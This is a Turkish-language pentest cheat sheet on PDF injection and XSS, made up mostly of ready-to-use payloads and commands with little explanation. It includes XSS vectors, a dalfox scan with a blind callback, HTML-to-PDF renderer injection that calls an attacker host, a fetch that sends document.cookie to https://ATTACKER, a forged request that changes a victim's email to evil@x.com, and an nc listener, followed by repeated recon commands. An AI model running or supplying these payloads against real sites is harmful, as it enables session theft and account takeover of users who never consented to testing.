Skip to content

PDF Injection

web xss

PDF Injection bağlamında saldırgan kontrollü script’in güvenilen origin’de çalışması hedeflenir. Reflected/stored/DOM yolları ve oturum sömürüsü odaklıdır.

  1. Yansıma bağlamını (HTML/attr/JS/URL) işaretçi ile bul.

  2. Bağlama uygun payload ve encode katmanını kır.

  3. CSP/WAF varsa gadget veya bypass dene.

  4. Oturum çalma veya işlem PoC’si üret.

pt7x9MARKER
Terminal window
curl -sk 'https://TARGET/search?q=pt7x9MARKER' | rg -n 'pt7x9MARKER'
<svg/onload=alert(document.domain)>
"><img src=x onerror=alert(1)>
';alert(document.domain)//
Terminal window
dalfox url 'https://TARGET/search?q=FUZZ' -b https://ATTACKER/
<script>app.alert(1)</script>
HTML→PDF motoru (wkhtmltopdf/chrome headless) script çalıştırır
Terminal window
curl -sk -F 'html=<img src=x onerror=fetch("https://ATTACKER")>' https://TARGET/render
fetch('https://ATTACKER/c?'+document.cookie)
fetch('/api/change-email',{method:'POST',credentials:'include',headers:{'Content-Type':'application/json'},body:JSON.stringify({email:'evil@x.com'})})
Terminal window
nc -lvnp 8000

PDF Injection sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html